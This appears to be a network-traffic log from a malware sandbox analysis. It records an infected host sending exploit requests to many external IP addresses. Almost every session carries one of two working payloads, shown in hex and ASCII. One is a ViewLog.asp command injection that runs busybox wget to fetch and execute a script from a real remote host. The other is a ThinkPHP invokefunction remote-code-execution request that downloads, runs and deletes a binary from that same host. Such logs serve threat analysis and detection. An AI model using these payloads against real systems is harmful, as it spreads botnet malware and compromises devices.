                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        753192.168.2.235822694.122.18.2248080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:53.454097986 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        754192.168.2.234712895.100.51.15980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:53.540787935 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:53.880326986 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:53 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:53 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 63 66 39 30 61 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 34 31 33 26 23 34 36 3b 33 38 35 39 36 63 65 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 36 63 66 39 30 61 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 34 31 33 26 23 34 36 3b 33 38 35 39 36 63 65 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6cf90a17&#46;1713105413&#46;38596ce<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;6cf90a17&#46;1713105413&#46;38596ce</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        755192.168.2.233792495.100.206.15480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:53.566042900 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:53.913326025 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:53 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:53 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 34 34 35 31 39 64 34 26 23 34 36 3b 31 37 31 33 31 30 35 34 31 33 26 23 34 36 3b 37 37 38 39 37 33 31 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 38 34 34 35 31 39 64 34 26 23 34 36 3b 31 37 31 33 31 30 35 34 31 33 26 23 34 36 3b 37 37 38 39 37 33 31 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;844519d4&#46;1713105413&#46;7789731<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;844519d4&#46;1713105413&#46;7789731</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        756192.168.2.234496095.86.89.13880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:53.566214085 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        757192.168.2.233331095.38.89.11380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:53.656557083 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:54.065696955 CEST516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:36:53 GMT
                                                        Server: lighttpd/1.4.29
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        758192.168.2.235567688.221.143.8380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:53.844789982 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:54.148622036 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:53 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:53 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 39 35 61 31 36 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 31 33 26 23 34 36 3b 32 63 34 64 39 63 38 30 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 31 39 35 61 31 36 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 34 31 33 26 23 34 36 3b 32 63 34 64 39 63 38 30 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;195a1602&#46;1713105413&#46;2c4d9c80<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;195a1602&#46;1713105413&#46;2c4d9c80</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        759192.168.2.235967288.198.123.20380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:54.368303061 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:54.670316935 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:54 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        760192.168.2.235732288.134.149.20780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:54.405539989 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:54.760211945 CEST252INHTTP/1.1 404 Object Not Found
                                                        Date: Sun, 14 Apr 2024 14:36:54 GMT
                                                        Server: Microsoft-WinCE/7.00
                                                        Content-Type: text/html
                                                        Content-Length: 95
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Not Found</title></head><body>The requested URL was not found.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        761192.168.2.234232688.129.13.19680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:54.408994913 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:54.786813974 CEST276INHTTP/1.1 400 Bad Request
                                                        Server: Linux, HTTP/1.1, DIR-868L Ver 1.12
                                                        Date: Tue, 04 Jan 2000 01:34:52 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 119
                                                        Data Raw: 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 77 61 73 20 6e 6f 74 20 75 6e 64 65 72 73 74 6f 6f 64 20 6f 72 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 62 79 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a
                                                        Data Ascii: <title>400 Bad Request</title><h1>400 Bad Request</h1>Your request was not understood or not allowed by this server.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        762192.168.2.235114094.95.225.2508080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:55.155777931 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:55.503632069 CEST1289INHTTP/1.1 404
                                                        X-AREQUESTID: 996x2437x1
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-ASEN: SEN-11448787
                                                        Set-Cookie: atlassian.xsrf.token=BENB-RO32-GEAH-JCYL|108f1797520084f9a44c76854159bdae7de2d3e6|lout;path=/
                                                        X-AUSERNAME: anonymous
                                                        Set-Cookie: JSESSIONID=6EE709CA0AE4F8CEB3FAA51D4E95BEA5;path=/;HttpOnly
                                                        Content-Type: text/html;charset=UTF-8
                                                        Content-Length: 2495
                                                        Date: Sun, 14 Apr 2024 14:36:55 GMT
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e 53 70 69 61 63 65 6e 74 65 2c 20 69 6c 20 63 6f 6c 6c 65 67 61 6d 65 6e 74 6f 20 6e 6f 6e 20 c3 a8 20 64 69 73 70 6f 6e 69 62 69 6c 65 20 2d 20 4a 49 52 41 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 63 6f 6e 74 65 78 74 50 61 74 68 20 3d 20 22 22 3b 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 2f 73 74 61 74 69 63 2d 61 73 73 65 74 73 2f 6d 65 74 61 6c 2d 61 6c 6c 2e 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 73 74 61 74 69 63 2d 61 73 73 65 74 73 2f 6d 65 74 61 6c 2d 61 6c 6c 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 2f 73 74 61 74 69 63 2d 61 73 73 65 74 73 2f 6d 65 74 61 6c 2d 61 6c 6c 2d 69 65 2e 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 73 74 61 74 69 63 2d 61 73 73 65 74 73 2f 6d 65 74 61 6c 2d 61 6c 6c 2d 69 65 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 2f 73 74 61 74 69 63 2d 61 73 73 65 74 73 2f 6d 65 74 61 6c 2d 61 6c 6c 2d 69 65 39 2e 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 63 6f 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 20 65 72 72 6f 72 2d 70 61 67 65 20 65 72 72 6f 72 34 30 34 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Spiacente, il collegamento non disponibile - JIRA</title><script type="text/javascript">contextPath = "";</script><link type='text/css' rel='stylesheet' href='/static-assets/metal-all.css' media='all'><script src='/static-assets/metal-all.js'></script>...[if lt IE 9]><link type='text/css' rel='stylesheet' href='/static-assets/metal-all-ie.css' media='all'><script src='/static-assets/metal-all-ie.js'></script><![endif]-->...[if IE 9]><link type='text/css' rel='stylesheet' href='/static-assets/metal-all-ie9.css' media='all'><![endif]--><meta name="decorator" content="none" /></head><body class=" error-page error404"><script type="text/javascript">d


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        763192.168.2.235174031.200.56.2478080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:55.167419910 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        764192.168.2.235068062.29.25.468080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:55.168082952 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        765192.168.2.233338894.123.137.698080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:55.173772097 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        766192.168.2.235526631.136.242.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:55.470524073 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
